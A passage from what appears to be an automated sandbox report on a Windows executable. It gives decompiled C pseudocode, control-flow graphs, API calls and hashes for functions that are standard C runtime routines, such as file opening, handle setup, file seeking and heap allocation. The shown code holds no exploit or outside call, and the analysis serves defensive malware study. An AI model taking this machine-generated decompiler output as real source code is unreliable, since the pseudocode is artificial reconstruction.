					if(_t32 == 0) {
						E0040DC10(0x4403a0, 0x4403a8); // executed
						 *0x44bbe0 = 2;
						goto L9;
					}
					 *(_t56 - 4) = 0xfffffffe;
					goto L20;
				} else {
					L2:
					E004031B3(_t47, _t48, 7);
					goto L3;
				}
			}





















                                                      0x00402b24
                                                      0x00402b24
                                                      0x00402b24
                                                      0x00402b24
                                                      0x00402b35
                                                      0x00402b3c
                                                      0x00402b44
                                                      0x00402b4d
                                                      0x00402b4d
                                                      0x00402b4f
                                                      0x00402b52
                                                      0x00402b5b
                                                      0x00402b5e
                                                      0x00402b68
                                                      0x00000000
                                                      0x00000000
                                                      0x00402b6c
                                                      0x00402bb7
                                                      0x00402bb9
                                                      0x00402bbc
                                                      0x00402bbf
                                                      0x00402bc4
                                                      0x00402bca
                                                      0x00402bce
                                                      0x00402bd0
                                                      0x00402bd3
                                                      0x00402bd8
                                                      0x00402bd9
                                                      0x00402bdb
                                                      0x00402be1
                                                      0x00402be3
                                                      0x00402be5
                                                      0x00402bea
                                                      0x00402bea
                                                      0x00402bdb
                                                      0x00402bf1
                                                      0x00402bf3
                                                      0x00402bf5
                                                      0x00402bf8
                                                      0x00402bfd
                                                      0x00402bfe
                                                      0x00402c00
                                                      0x00402c02
                                                      0x00402c04
                                                      0x00402c09
                                                      0x00402c09
                                                      0x00402c00
                                                      0x00402c0a
                                                      0x00402c11
                                                      0x00402c1d
                                                      0x00402c21
                                                      0x00402c29
                                                      0x00402c2b
                                                      0x00402c30
                                                      0x00402c32
                                                      0x00402c35
                                                      0x00402c35
                                                      0x00402c3a
                                                      0x00402c3c
                                                      0x00402c3e
                                                      0x00402c3e
                                                      0x00402c47
                                                      0x00402c4e
                                                      0x00402c96
                                                      0x00402c9b
                                                      0x00402c9b
                                                      0x00402b6e
                                                      0x00402b7e
                                                      0x00402b87
                                                      0x00402ba4
                                                      0x00402bab
                                                      0x00000000
                                                      0x00402bab
                                                      0x00402b89
                                                      0x00000000
                                                      0x00402b46
                                                      0x00402b46
                                                      0x00402b48
                                                      0x00000000
                                                      0x00402b48

                                                      APIs
                                                      • ___security_init_cookie.LIBCMT ref: 00402B24
                                                      • ___scrt_fastfail.LIBCMT ref: 00402B48
                                                        • Part of subcall function 004031B3: IsProcessorFeaturePresent.KERNEL32(00000017,?,00000000), ref: 004031C0
                                                        • Part of subcall function 004031B3: IsDebuggerPresent.KERNEL32(?,?,?,00000017,?,00000000), ref: 00403288
                                                        • Part of subcall function 004031B3: SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,00000017,?,00000000), ref: 004032A7
                                                        • Part of subcall function 004031B3: UnhandledExceptionFilter.KERNEL32(?,?,?,?,00000017,?,00000000), ref: 004032B1
                                                      • ___scrt_release_startup_lock.LIBCMT ref: 00402BBF
                                                      • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 00402BD3
                                                      • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 00402BF8
                                                      • ___scrt_uninitialize_crt.LIBCMT ref: 00402C47
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.309128931.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.309090479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309203991.0000000000440000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309219549.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309226306.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterPresentUnhandled___scrt_is_nonwritable_in_current_image$DebuggerFeatureProcessor___scrt_fastfail___scrt_release_startup_lock___scrt_uninitialize_crt___security_init_cookie
                                                      • String ID:
                                                      • API String ID: 4205019024-0
                                                      • Opcode ID: 1685c0a446860bc5f38a233ea0525e4c30c1580459a1ec312a630d70e01dee35
                                                      • Instruction ID: 3944e74404bc800a49682baa2dbb88a24ec57f21ebed9b38b5c03b0c1e873950
                                                      • Opcode Fuzzy Hash: 1685c0a446860bc5f38a233ea0525e4c30c1580459a1ec312a630d70e01dee35
                                                      • Instruction Fuzzy Hash: A4314F315486019AEA207F729E0BB5E3B649F12369F20007FF4807B2D3CEFD5A01925D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0042E1EC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 273 42e1ec-42e210 CreateFileW
                                                      C-Code - Quality: 100%
                                                      			E0042E1EC(WCHAR* _a4, char _a8, long _a16, long _a20, long _a24, signed int _a28, signed int _a32) {
				void* _t10;

				_t4 =  &_a8; // 0x42e774
				_t10 = CreateFileW(_a4, _a16, _a24,  *_t4, _a20, _a28 | _a32, 0); // executed
				return _t10;
			}




                                                      0x0042e1fd
                                                      0x0042e209
                                                      0x0042e210

                                                      APIs
                                                      • CreateFileW.KERNELBASE(00000000,?,?,tB,?,?,00000000,?,0042E774,?,0000000C), ref: 0042E209
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.309128931.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.309090479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309203991.0000000000440000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309219549.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309226306.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID: tB
                                                      • API String ID: 823142352-1138207000
                                                      • Opcode ID: 742c9c0143e8768aaf01108c320ff57b58abe72665de80c4b387ac2732fe03e7
                                                      • Instruction ID: 4e73bb688b8081490096ad3c9d53a3bf8698f265b56bb7b08b5c7b2d7136e7c2
                                                      • Opcode Fuzzy Hash: 742c9c0143e8768aaf01108c320ff57b58abe72665de80c4b387ac2732fe03e7
                                                      • Instruction Fuzzy Hash: 91D06C3200020DBBDF028F84DD06EDA3BAAFB48714F018010BA1856020C732E831AB94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00420C63 Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 274 420c63-420c68 275 420c6a-420c82 274->275 276 420c90-420c99 275->276 277 420c84-420c88 275->277 279 420cab 276->279 280 420c9b-420c9e 276->280 277->276 278 420c8a-420c8e 277->278 284 420d05-420d09 278->284 283 420cad-420cba GetStdHandle 279->283 281 420ca0-420ca5 280->281 282 420ca7-420ca9 280->282 281->283 282->283 285 420ce7-420cf9 283->285 286 420cbc-420cbe 283->286 284->275 287 420d0f-420d12 284->287 285->284 289 420cfb-420cfe 285->289 286->285 288 420cc0-420cc9 GetFileType 286->288 288->285 290 420ccb-420cd4 288->290 289->284 291 420cd6-420cda 290->291 292 420cdc-420cdf 290->292 291->284 292->284 293 420ce1-420ce5 292->293 293->284
                                                      C-Code - Quality: 86%
                                                      			E00420C63() {
				signed int _t20;
				signed int _t22;
				long _t23;
				signed char _t25;
				void* _t28;
				signed int _t31;
				void* _t33;

				_t31 = 0;
				do {
					_t20 = _t31 & 0x0000003f;
					_t33 = _t20 * 0x38 +  *((intOrPtr*)(0x44c9f8 + (_t31 >> 6) * 4));
					if( *(_t33 + 0x18) == 0xffffffff ||  *(_t33 + 0x18) == 0xfffffffe) {
						 *(_t33 + 0x28) = 0x81;
						_t22 = _t31;
						if(_t22 == 0) {
							_push(0xfffffff6);
						} else {
							if(_t22 == 1) {
								_push(0xfffffff5);
							} else {
								_push(0xfffffff4);
							}
						}
						_pop(_t23);
						_t28 = GetStdHandle(_t23);
						if(_t28 == 0xffffffff || _t28 == 0) {
							L16:
							 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000040;
							 *(_t33 + 0x18) = 0xfffffffe;
							_t20 =  *0x44c9e8; // 0x6af540
							if(_t20 != 0) {
								_t20 =  *(_t20 + _t31 * 4);
								 *(_t20 + 0x10) = 0xfffffffe;
							}
							goto L18;
						} else {
							_t25 = GetFileType(_t28); // executed
							if(_t25 == 0) {
								goto L16;
							} else {
								_t20 = _t25 & 0x000000ff;
								 *(_t33 + 0x18) = _t28;
								if(_t20 != 2) {
									if(_t20 == 3) {
										 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000008;
									}
								} else {
									 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000040;
								}
								goto L18;
							}
						}
					} else {
						 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000080;
					}
					L18:
					_t31 = _t31 + 1;
				} while (_t31 != 3);
				return _t20;
			}










                                                      0x00420c68
                                                      0x00420c6a
                                                      0x00420c6e
                                                      0x00420c77
                                                      0x00420c82
                                                      0x00420c92
                                                      0x00420c96
                                                      0x00420c99
                                                      0x00420cab
                                                      0x00420c9b
                                                      0x00420c9e
                                                      0x00420ca7
                                                      0x00420ca0
                                                      0x00420ca3
                                                      0x00420ca3
                                                      0x00420c9e
                                                      0x00420cad
                                                      0x00420cb5
                                                      0x00420cba
                                                      0x00420ce7
                                                      0x00420ce7
                                                      0x00420ceb
                                                      0x00420cf2
                                                      0x00420cf9
                                                      0x00420cfb
                                                      0x00420cfe
                                                      0x00420cfe
                                                      0x00000000
                                                      0x00420cc0
                                                      0x00420cc1
                                                      0x00420cc9
                                                      0x00000000
                                                      0x00420ccb
                                                      0x00420ccb
                                                      0x00420cce
                                                      0x00420cd4
                                                      0x00420cdf
                                                      0x00420ce1
                                                      0x00420ce1
                                                      0x00420cd6
                                                      0x00420cd6
                                                      0x00420cd6
                                                      0x00000000
                                                      0x00420cd4
                                                      0x00420cc9
                                                      0x00420c8a
                                                      0x00420c8a
                                                      0x00420c8a
                                                      0x00420d05
                                                      0x00420d05
                                                      0x00420d06
                                                      0x00420d12

                                                      APIs
                                                      • GetStdHandle.KERNEL32(000000F6), ref: 00420CAF
                                                      • GetFileType.KERNELBASE(00000000), ref: 00420CC1
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.309128931.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.309090479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309203991.0000000000440000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309219549.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309226306.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: FileHandleType
                                                      • String ID:
                                                      • API String ID: 3000768030-0
                                                      • Opcode ID: 5c0e7a56566f6541489c76f998fffc36e02b4f631b65aae2d40f13ea36636c50
                                                      • Instruction ID: c7e7c8a24bd5474ce2993d3a7dc1774a0c51339f0ef49f86f47013b9af9784a9
                                                      • Opcode Fuzzy Hash: 5c0e7a56566f6541489c76f998fffc36e02b4f631b65aae2d40f13ea36636c50
                                                      • Instruction Fuzzy Hash: 9B11B4B13147618AC7384E3FAC886237AD5A756330B78072BD5F6866F7C638D882D60D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041F65C Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 294 41f65c-41f674 call 4267ad 297 41f676-41f67d 294->297 298 41f68a-41f6a0 SetFilePointerEx 294->298 299 41f684-41f688 297->299 300 41f6a2-41f6b3 GetLastError call 420e05 298->300 301 41f6b5-41f6bf 298->301 302 41f6db-41f6de 299->302 300->299 301->299 304 41f6c1-41f6d6 301->304 304->302
                                                      C-Code - Quality: 88%
                                                      			E0041F65C(void* __ecx, void* __eflags, signed int _a4, union _LARGE_INTEGER _a8, union _LARGE_INTEGER* _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				void* _v12;
				void* _t19;
				int _t20;
				signed int _t23;
				intOrPtr _t26;
				signed int _t37;
				signed int _t38;
				signed int _t41;

				_t41 = _a4;
				_push(_t37);
				_t19 = E004267AD(_t41);
				_t38 = _t37 | 0xffffffff;
				if(_t19 != _t38) {
					_push(_a16);
					_t20 = SetFilePointerEx(_t19, _a8, _a12,  &_v12); // executed
					if(_t20 != 0) {
						if((_v12 & _v8) == _t38) {
							goto L2;
						} else {
							_t23 = _v12;
							_t44 = (_t41 & 0x0000003f) * 0x38;
							 *( *((intOrPtr*)(0x44c9f8 + (_t41 >> 6) * 4)) + _t44 + 0x28) =  *( *((intOrPtr*)(0x44c9f8 + (_t41 >> 6) * 4)) + 0x28 + (_t41 & 0x0000003f) * 0x38) & 0x000000fd;
						}
					} else {
						E00420E05(GetLastError(), _a20);
						goto L2;
					}
				} else {
					_t26 = _a20;
					 *((char*)(_t26 + 0x1c)) = 1;
					 *((intOrPtr*)(_t26 + 0x18)) = 9;
					L2:
					_t23 = _t38;
				}
				return _t23;
			}












                                                      0x0041f664
                                                      0x0041f667
                                                      0x0041f669
                                                      0x0041f66e
                                                      0x0041f674
                                                      0x0041f68a
                                                      0x0041f698
                                                      0x0041f6a0
                                                      0x0041f6bf
                                                      0x00000000
                                                      0x0041f6c1
                                                      0x0041f6c1
                                                      0x0041f6cc
                                                      0x0041f6d6
                                                      0x0041f6d6
                                                      0x0041f6a2
                                                      0x0041f6ac
                                                      0x00000000
                                                      0x0041f6b2
                                                      0x0041f676
                                                      0x0041f676
                                                      0x0041f679
                                                      0x0041f67d
                                                      0x0041f684
                                                      0x0041f684
                                                      0x0041f686
                                                      0x0041f6de

                                                      APIs
                                                      • SetFilePointerEx.KERNELBASE(00000000,?,?,?,00000002,?,00000000,00000000,00000000,?,0041F595,?,?,?,00000002,00000000), ref: 0041F698
                                                      • GetLastError.KERNEL32(00000000,?,0041F595,?,?,?,00000002,00000000,00448550,00000018,0041F88A,?,?,?,00000002,00000000), ref: 0041F6A5
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.309128931.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.309090479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309203991.0000000000440000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309219549.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309226306.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: ErrorFileLastPointer
                                                      • String ID:
                                                      • API String ID: 2976181284-0
                                                      • Opcode ID: e1bd3e1da9b1340233405164bc92bee7649c40a6c4144de90cdc5f0cdff8d2db
                                                      • Instruction ID: 456bb4f98356b41642f42013b8bc71f142371dcaa3365eba6ea36069b6e4943f
                                                      • Opcode Fuzzy Hash: e1bd3e1da9b1340233405164bc92bee7649c40a6c4144de90cdc5f0cdff8d2db
                                                      • Instruction Fuzzy Hash: 6B012632610215AFCF058F59DC05CDE3B29DB85324B25021EF8119B2A0EA75DD93CBD8
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040A7DB Relevance: 1.7, APIs: 1, Instructions: 157COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 306 40a7db-40a7e8 307 40a812-40a826 call 41f218 306->307 308 40a7ea-40a80d call 41f0ed 306->308 313 40a828 307->313 314 40a82b-40a834 call 41f871 307->314 315 40a979-40a97b 308->315 313->314 317 40a839-40a848 314->317 318 40a858-40a861 317->318 319 40a84a 317->319 322 40a863-40a870 318->322 323 40a875-40a8a9 318->323 320 40a850-40a852 319->320 321 40a922-40a927 319->321 320->318 320->321 324 40a977-40a978 321->324 325 40a975 322->325 326 40a906-40a912 323->326 327 40a8ab-40a8b5 323->327 324->315 325->324 328 40a914-40a91b 326->328 329 40a929-40a92c 326->329 330 40a8b7-40a8c3 327->330 331 40a8dc-40a8e8 327->331 328->321 332 40a92f-40a937 329->332 330->331 333 40a8c5-40a8d7 call 40ac90 330->333 331->329 334 40a8ea-40a904 call 40ae3b 331->334 336 40a973 332->336 337 40a939-40a93f 332->337 333->324 334->332 336->325 340 40a941-40a955 call 40aad1 337->340 341 40a957-40a95b 337->341 340->324 344 40a95d-40a96b call 43a110 341->344 345 40a96e-40a970 341->345 344->345 345->336
                                                      C-Code - Quality: 93%
                                                      			E0040A7DB(signed int __edx, void* __esi, intOrPtr* _a4, signed int _a8) {
				signed int _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t70;
				signed int _t71;
				signed char _t73;
				signed int _t75;
				signed char _t82;
				signed int _t85;
				signed char _t86;
				signed int _t87;
				intOrPtr _t88;
				void* _t89;
				intOrPtr _t90;
				signed int _t93;
				signed int _t97;
				signed int _t99;
				intOrPtr _t102;
				signed int _t103;
				signed int _t104;
				intOrPtr* _t105;
				signed char _t106;
				signed int _t107;
				signed int _t109;
				signed int _t112;
				signed int _t117;
				intOrPtr* _t118;
				void* _t121;
				void* _t122;

				_t116 = __esi;
				_t108 = __edx;
				if(_a4 != 0) {
					_t70 = E0041F218(_a4);
					_t102 = _a4;
					_t97 = _t70;
					__eflags =  *(_t102 + 8);
					if( *(_t102 + 8) < 0) {
						 *(_t102 + 8) = 0;
					}
					_t71 = E0041F871(_t97, 0, 0, 1, _a8); // executed
					_t103 = _t108;
					_t122 = _t121 + 0x14;
					_v8 = _t103;
					_t117 = _t71;
					_v28 = _t117;
					__eflags = _t103;
					if(__eflags > 0) {
						L7:
						_t73 =  *(_a4 + 0xc);
						__eflags = _t73 & 0x000000c0;
						if((_t73 & 0x000000c0) != 0) {
							_t75 = _t97 >> 6;
							_t104 = (_t97 & 0x0000003f) * 0x38;
							_v16 = _t75;
							_v20 = _t104;
							_t105 = _a4;
							_v12 =  *((intOrPtr*)(_t104 +  *((intOrPtr*)(0x44c9f8 + _t75 * 4)) + 0x29));
							_t106 =  *(_t105 + 0xc);
							asm("cdq");
							_t99 =  *_t105 -  *((intOrPtr*)(_t105 + 4));
							_v24 = _t108;
							__eflags = _t106 & 0x00000003;
							if((_t106 & 0x00000003) == 0) {
								_t82 =  *(_a4 + 0xc) >> 2;
								__eflags = _t82 & 0x00000001;
								if((_t82 & 0x00000001) != 0) {
									L18:
									_t118 = _a4;
									_t103 = _v24;
									L19:
									_t109 = _v28;
									__eflags = _t109 | _v8;
									if((_t109 | _v8) == 0) {
										L25:
										_t85 = _t99;
										L26:
										goto L27;
									}
									_t86 =  *(_t118 + 0xc);
									__eflags = _t86 & 0x00000001;
									if((_t86 & 0x00000001) == 0) {
										__eflags = _v12 - 1;
										if(_v12 == 1) {
											_t87 = E0043A110(_t99, _t103, 2, 0);
											_t103 = _t109;
											_t99 = _t87;
											_t109 = _v28;
										}
										_t99 = _t99 + _t109;
										asm("adc ecx, [ebp-0x4]");
										goto L25;
									}
									_t85 = E0040AAD1(_a4, _t109, _v8, _t99, _t103, _a8);
									goto L27;
								}
								_t71 = _a8;
								 *((char*)(_t71 + 0x1c)) = 1;
								 *((intOrPtr*)(_t71 + 0x18)) = 0x16;
								goto L17;
							}
							__eflags = _v12 - 1;
							_t107 = _v16;
							_t112 = _v20;
							if(_v12 != 1) {
								L13:
								_t88 =  *((intOrPtr*)(0x44c9f8 + _t107 * 4));
								__eflags =  *((char*)(_t112 + _t88 + 0x28));
								if( *((char*)(_t112 + _t88 + 0x28)) >= 0) {
									goto L18;
								}
								_t118 = _a4;
								_t89 = E0040AE3B( *((intOrPtr*)(_t118 + 4)),  *_t118, _v12);
								_t103 = _v24;
								_t122 = _t122 + 0xc;
								_t99 = _t99 + _t89;
								asm("adc ecx, edx");
								goto L19;
							}
							_t90 =  *((intOrPtr*)(0x44c9f8 + _t107 * 4));
							__eflags =  *(_t112 + _t90 + 0x2d) & 0x00000002;
							if(( *(_t112 + _t90 + 0x2d) & 0x00000002) == 0) {
								goto L13;
							}
							_t85 = E0040AC90(_t99, 0, _t117, _a4, _t117, _v8, _a8);
							goto L27;
						}
						asm("cdq");
						_t85 = _t117 -  *((intOrPtr*)(_a4 + 8));
						asm("sbb ecx, edx");
						goto L26;
					} else {
						if(__eflags < 0) {
							L17:
							_t85 = _t71 | 0xffffffff;
							L27:
							return _t85;
						}
						__eflags = _t117;
						if(_t117 < 0) {
							goto L17;
						}
						goto L7;
					}
				}
				_t93 = _a8;
				 *((char*)(_t93 + 0x1c)) = 1;
				 *((intOrPtr*)(_t93 + 0x18)) = 0x16;
				return E0041F0ED(0, __esi, 0, 0, 0, 0, 0, _t93) | 0xffffffff;
			}






































                                                      0x0040a7db
                                                      0x0040a7db
                                                      0x0040a7e8
                                                      0x0040a816
                                                      0x0040a81c
                                                      0x0040a821
                                                      0x0040a823
                                                      0x0040a826
                                                      0x0040a828
                                                      0x0040a828
                                                      0x0040a834
                                                      0x0040a839
                                                      0x0040a83b
                                                      0x0040a83e
                                                      0x0040a841
                                                      0x0040a843
                                                      0x0040a846
                                                      0x0040a848
                                                      0x0040a858
                                                      0x0040a85b
                                                      0x0040a85f
                                                      0x0040a861
                                                      0x0040a87a
                                                      0x0040a87d
                                                      0x0040a880
                                                      0x0040a88a
                                                      0x0040a891
                                                      0x0040a894
                                                      0x0040a89c
                                                      0x0040a89f
                                                      0x0040a8a0
                                                      0x0040a8a2
                                                      0x0040a8a6
                                                      0x0040a8a9
                                                      0x0040a90d
                                                      0x0040a910
                                                      0x0040a912
                                                      0x0040a929
                                                      0x0040a929
                                                      0x0040a92c
                                                      0x0040a92f
                                                      0x0040a92f
                                                      0x0040a934
                                                      0x0040a937
                                                      0x0040a973
                                                      0x0040a973
                                                      0x0040a975
                                                      0x00000000
                                                      0x0040a975
                                                      0x0040a939
                                                      0x0040a93d
                                                      0x0040a93f
                                                      0x0040a957
                                                      0x0040a95b
                                                      0x0040a962
                                                      0x0040a967
                                                      0x0040a969
                                                      0x0040a96b
                                                      0x0040a96b
                                                      0x0040a96e
                                                      0x0040a970
                                                      0x00000000
                                                      0x0040a970
                                                      0x0040a94d
                                                      0x00000000
                                                      0x0040a952
                                                      0x0040a914
                                                      0x0040a917
                                                      0x0040a91b
                                                      0x00000000
                                                      0x0040a91b
                                                      0x0040a8ab
                                                      0x0040a8af
                                                      0x0040a8b2
                                                      0x0040a8b5
                                                      0x0040a8dc
                                                      0x0040a8dc
                                                      0x0040a8e3
                                                      0x0040a8e8
                                                      0x00000000
                                                      0x00000000
                                                      0x0040a8ea
                                                      0x0040a8f5
                                                      0x0040a8fa
                                                      0x0040a8fd
                                                      0x0040a900
                                                      0x0040a902
                                                      0x00000000
                                                      0x0040a902
                                                      0x0040a8b7
                                                      0x0040a8be
                                                      0x0040a8c3
                                                      0x00000000
                                                      0x00000000
                                                      0x0040a8cf
                                                      0x00000000
                                                      0x0040a8d4
                                                      0x0040a869
                                                      0x0040a86c
                                                      0x0040a86e
                                                      0x00000000
                                                      0x0040a84a
                                                      0x0040a84a
                                                      0x0040a922
                                                      0x0040a922
                                                      0x0040a977
                                                      0x00000000
                                                      0x0040a978
                                                      0x0040a850
                                                      0x0040a852
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040a852
                                                      0x0040a848
                                                      0x0040a7ea
                                                      0x0040a7f5
                                                      0x0040a7f9
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.309128931.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.309090479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309203991.0000000000440000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309219549.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309226306.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 124943c9c051efc4893f7da4af96832bbf8e139f68d026f43b9b87fe6dc6a7f0
                                                      • Instruction ID: 454809f667ddd57ac48815e9889ccc30603dea6624be2f852c6ea1dc2b89aad5
                                                      • Opcode Fuzzy Hash: 124943c9c051efc4893f7da4af96832bbf8e139f68d026f43b9b87fe6dc6a7f0
                                                      • Instruction Fuzzy Hash: AD5106B4A00204AFCF10DF58C885EAE7BB1EF49314F25816AF8486B392C335DD52CB96
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00421509 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 349 421509-42152f call 421074 352 421531-421543 call 42e655 349->352 353 421588-42158b 349->353 355 421548-42154d 352->355 355->353 356 42154f-421587 355->356
                                                      C-Code - Quality: 72%
                                                      			E00421509(void* __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				char _v8;
				char _v12;
				void* _v16;
				intOrPtr _v20;
				char _v32;
				void* _t26;

				E00421074(__ecx,  &_v32, _a8);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				if(_v12 == 0) {
					L3:
					return 0;
				} else {
					_t26 = E0042E655( &_v8, _a4, _v20, _a12, 0x180); // executed
					if(_t26 != 0) {
						goto L3;
					} else {
						 *0x44c9ec =  *0x44c9ec + 1;
						asm("lock or [eax], ecx");
						 *((intOrPtr*)(_a16 + 8)) = 0;
						 *((intOrPtr*)(_a16 + 0x1c)) = 0;
						 *((intOrPtr*)(_a16 + 4)) = 0;
						 *_a16 = 0;
						 *((intOrPtr*)(_a16 + 0x10)) = _v8;
						return _a16;
					}
				}
			}









                                                      0x0042151a
                                                      0x00421526
                                                      0x00421527
                                                      0x00421528
                                                      0x0042152f
                                                      0x00421588
                                                      0x0042158b
                                                      0x00421531
                                                      0x00421543
                                                      0x0042154d
                                                      0x00000000
                                                      0x0042154f
                                                      0x00421552
                                                      0x0042155e
                                                      0x00421566
                                                      0x0042156c
                                                      0x00421572
                                                      0x00421578
                                                      0x00421580
                                                      0x00421587
                                                      0x00421587
                                                      0x0042154d

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.309128931.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.309090479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309203991.0000000000440000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309219549.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000001.00000002.309226306.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: __wsopen_s
                                                      • String ID:
                                                      • API String ID: 3347428461-0
                                                      • Opcode ID: 385f184ee9f5755d13696badef40191a1e25fb4b245d49049715b388e2e3723b
                                                      • Instruction ID: 6a2e020f794424b2cc925fa4280ebecb01c0ce69c94c8deb025cb138c42ea004
                                                      • Opcode Fuzzy Hash: 385f184ee9f5755d13696badef40191a1e25fb4b245d49049715b388e2e3723b
                                                      • Instruction Fuzzy Hash: 9C114871A0010AAFCF05DF58E94198B7BF4EF58304F0540AAF805EB351D634DA11CB68
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004108CD Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 357 4108cd-4108d8 358 4108e6-4108ec 357->358 359 4108da-4108e4 357->359 361 410905-410916 RtlAllocateHeap 358->361 362 4108ee-4108ef 358->362 359->358 360 41091a-410925 call 420e3c 359->360 367 410927-410929 360->367 363 4108f1-4108f8 call 410081 361->363 364 410918 361->364 362->361 363->360 370 4108fa-410903 call 42b0c3 363->370 364->367 370->360 370->361
                                                      C-Code - Quality: 100%
                                                      			E004108CD(signed int _a4, signed int _a8) {
				void* _t8;
				void* _t12;
				signed int _t13;
				signed int _t18;
				long _t19;

				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
